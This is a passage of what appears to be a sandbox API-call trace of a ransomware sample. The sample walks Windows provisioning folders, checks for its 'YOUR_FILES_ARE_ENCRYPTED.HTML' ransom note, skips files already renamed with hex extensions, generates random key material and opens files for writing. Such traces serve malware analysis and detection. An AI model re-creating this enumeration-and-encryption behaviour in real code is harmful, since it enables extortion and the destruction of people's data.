dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.053] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.053] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned 97 [0110.053] GetProcessHeap () returned 0x600000 [0110.053] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.053] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime" [0110.053] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*" [0110.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaecb51a0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.053] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaecb51a0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="..", cAlternateFileName="")) returned 1 [0110.054] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa198dbb0, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa198dbb0, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19b3e1c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xfcb, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.054] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.054] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.054] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.054] lstrlenW (lpString=".provxml") returned 8 [0110.054] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.054] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa19da08f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.054] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.054] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.054] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.054] lstrlenW (lpString=".provxml") returned 8 [0110.054] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.055] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1a002fa, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1a002fa, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1 [0110.055] StrStrIW (lpFirst="Power_2.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.055] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml") returned 113 [0110.055] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0110.055] lstrlenW (lpString=".provxml") returned 8 [0110.055] PathFindExtensionW (pszPath="Power_2.provxml") returned=".provxml" [0110.055] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaecb041a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaecb041a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecb8c89, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.055] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaecb041a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaecb041a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecb8c89, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f425c, dwReserved1=0x6f41a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.055] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.055] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.055] GetProcessHeap () returned 0x600000 [0110.055] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.055] GetProcessHeap () returned 0x600000 [0110.055] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.055] GetProcessHeap () returned 0x600000 [0110.055] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.056] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19b3e1c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19b3e1c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaed636b6, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x22b, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml.6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C", cAlternateFileName="RUNTIM~1.6AA")) returned 1 [0110.056] StrStrIW (lpFirst="RunTime.xml.6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.056] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C") returned 166 [0110.056] PathFindExtensionW (pszPath="RunTime.xml.6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C") returned=".6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C" [0110.056] lstrlenW (lpString=".6AA9D8602584E7EE923656F3FF25311FE9171749B03854A8A76C810DEEEADF4C") returned 65 [0110.056] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaecc7792, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaecc7792, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeccc63d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.056] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaecc7792, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaecc7792, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeccc63d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.056] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.057] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.057] GetProcessHeap () returned 0x600000 [0110.057] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.057] GetProcessHeap () returned 0x600000 [0110.057] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.057] GetProcessHeap () returned 0x600000 [0110.057] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.058] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeccef30, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeccef30, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecdd63f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.058] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeccef30, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeccef30, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaecdd63f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.058] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.058] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.058] GetProcessHeap () returned 0x600000 [0110.058] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.059] GetProcessHeap () returned 0x600000 [0110.059] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.059] GetProcessHeap () returned 0x600000 [0110.059] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.059] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed26a62, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed26a62, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", cAlternateFileName="{8FB7D~1")) returned 1 [0110.059] StrStrIW (lpFirst="{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.059] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned 84 [0110.059] GetProcessHeap () returned 0x600000 [0110.059] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.060] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}" [0110.060] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*" [0110.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed26a62, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed26a62, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.061] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaed26a62, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaed26a62, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.061] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa166c88f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa166c88f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaed30366, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x36b, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21", cAlternateFileName="CUSTOM~1.245")) returned 1 [0110.061] StrStrIW (lpFirst="customizations.xml.24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.061] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\customizations.xml.24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21") returned 168 [0110.061] PathFindExtensionW (pszPath="customizations.xml.24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21") returned=".24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21" [0110.061] lstrlenW (lpString=".24573DE981C0717B812B75A2CEB24250474C6F059BD938193ED15754443D1B21") returned 65 [0110.061] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa166c88f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa166c88f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa166c88f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.061] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.061] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml") returned 104 [0110.061] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.061] lstrlenW (lpString=".xml") returned 4 [0110.061] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.061] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.061] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.062] CloseHandle (hObject=0x30c) returned 1 [0110.062] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.062] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.062] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned 89 [0110.062] GetProcessHeap () returned 0x600000 [0110.062] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.063] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov" [0110.063] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*" [0110.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed0d06d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.063] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaed0d06d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.063] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.063] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.063] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned 97 [0110.063] GetProcessHeap () returned 0x600000 [0110.063] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.064] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{8fb7d64e-70fc-4f9d-89ee-d486817534df}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All 